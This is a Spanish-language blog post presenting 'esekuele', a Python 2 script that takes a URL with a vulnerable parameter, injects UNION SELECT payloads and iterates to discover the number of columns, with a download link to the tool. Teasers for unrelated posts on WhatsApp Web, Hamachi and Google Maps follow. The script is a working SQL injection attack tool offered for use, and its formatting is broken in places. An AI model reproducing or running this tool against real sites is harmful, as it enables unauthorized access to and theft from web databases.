Ir al contenido principal

Esekuele v 0.1

Bueno esta es la primera version de esekuele conforme vaya teniendo mas tiempo y mas ideas la tratare de ir mejorando

hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena:

The used SELECT statements have a different number of columns

y de ahi sacar el numero de columnas.

ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo Lengua y tambien si tienen ideas son
aceptadas para ver que mas le podemos poner :-D

aqui les dejo el code:

import urllib2
import string
uno
= "-1/**/union/**/select/**/"
dos = "-1+union+select+/"
print '\n |-----------------------------------------------------------|'
print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|'
print '\n |-------------------| esekuele.py |-------------------------|'
print '\n |-----------------------------------------------------------|'
print '\n |Uso: \n Ingresa Url: '
 

print
'\n |http://www.pagina.com.mx/index.php?id='

print '\n |Donde: id es la variable vulnerable'
print '\n |-----------------------------------------------------------\n\n'
print '\nIngresa la Url'
url2 = raw_input("")
print
'\nEscoje la Inyexion:'
print '\n1: -1/**/union/**/select/**/'
print '\npronto mas xD'
iny = raw_input("")
if
iny == '1':

 
url = url2 + uno
#elif iny == '2':
#
 
url = url2 + dos
else:
 
print
'\nYou think you could fool me -.-'
 
exit()
a = "1"
sql = url + a + "/*"

vulnerable = urllib2.urlopen(sql)
vulnerable2 = vulnerable.read()
if
vulnerable2.find("The used SELECT statements have a different number of columns") >= 0:
 
print
"Es vulnerable, continua el proceso...."
else:
 
print
"No es vulnerable o al menos el inyector no lo detecta xD"

 
exit()
b = 2
for x in range(1, 2000):
 
print
url + a + "/*"
 
sql = url + a + "/*"
 
iny = urllib2.urlopen(sql)
 
chekar = iny.read()
 
if
chekar.find("The used SELECT statements have a different number of columns") >= 0:
 
 
print
"aumentanto columna"

 
else:
 
 
print
"Columnas encontradas... lucky strike!!!"
 
 
print
url + a + "/*"
 
 
print
"Have fun!! :-D"
 
 
exit()
 

 
print
iny.read()
 
iny.close()
 
str(a)

 
a = a + "," + str(b)
 
b = b + 1

y les adjunto el archivo y un screen de como funciona Lengua :

http://hslteam.org/esekuele.rar

Comentarios

Entradas populares de este blog

Whatsapp web, la seguridad que manejan y el adiós de tu batería.

¿Por que se tiene que dejar el móvil con conexión a internet para poder usar whatsapp web? Armé este pequeño documento para explicar el como funciona este sistema, que realmente se me hace ingenioso, no funcional, pero ingenioso. La actualización en móvil de whatsapp incluye una nueva tabla, la cual se llama sesiones, en esta hay campos como: browser_id (23 caracteres aprox) secret (88 caracteres aprox) token (44 caractere saprox) Solo por mencionar algunos. Estos datos son los que se mostrarán al entrar al apartado whatsapp web de nuestros móviles, al principio se piensa que solo es para tener un "control" propio de los dispositivos conectados, pero mas adelante explicare el funcionamiento un poco mas extenso de esto. Al abrir el menú de whatsapp web, nos da para escanear un código qr, si analizamos este código, tenemos algo como esto: bjqPtTTbnhUvq1FWyLZmMh1RhesUcGU8eJMG2aUnrps4z2Z80XBiUVguqJ2Cb9YUyQY2t32apwXpP2qn4QAWbHXsNQV7ik7CT2PZbsfNEU+2ThPFhjRTVS7act+7irrQIbPSCHon8GCFX...

Solución [fix] a hamachi Logging in .. failed, busy

Hola! Aquí con una pequeña entrada, pero que a más de uno le será útil. Tengo hamachi instalado en varias máquinas, pero en una precisamente al reiniciar, algunas veces me da este problema: usuarioserver@server:~$ sudo hamachi login [sudo] password for usuarioserver: Logging in .. failed, busy Lo busqué en internet y la "solución" que dan, es reinstalar hamachi, y para los que han instalado hamachi en ubuntu, saben que no es una opción, pues se tendrían que hacer estos pasos:  sudo apt-get remove logmein-hamachi sudo dpkg -i logmein-hamachixxx.deb sudo apt-get install -f Para lo cual (siempre) es molesto hacer esos pasos, y algunas veces la configuración se llega a perder.  Para solucionar ese problema, basta con hacer un:  sudo /etc/init.d/logmein-hamachi force-reload Esto forzará el reinicio de hamachi, y así después hacen:  sudo hamachi login Y listo, el problema de failed busy desaparece y los deja loguear bien en la re...

Integrar API de Google Maps, archivos kml, kmz y otras fumarolas :D

Ya que andamos en eso de la posteada ahora les voy a dejar un pequeño manual sobre como integrar la API de maps (google) dentro de nuestro código, hay varia documentación en la página developers de google, pero realmente lo que uno busca cuando pone en google: "integrar api de maps" es ver un ejemplo claro y directo para que se pueda entender de mejor forma. Así que pues ya comentada la información de arriba les paso a dejar un ejemplo. Lo primero que tenemos que poner en nuestro código es la llamada a la API de maps: < script type = " text/javascript " src = " http://maps.googleapis.com/maps/api/js?sensor=false&language=es " > < / script > En este caso la variable sensor está en false, esto nos indica que no hay un dispositivo gps que pueda tomar la ubicación (se pone generalmente en true cuando es para aplicación movil, llámese celular o tableta) El lenguaje declaramos español, esto es para los menús que se van a most...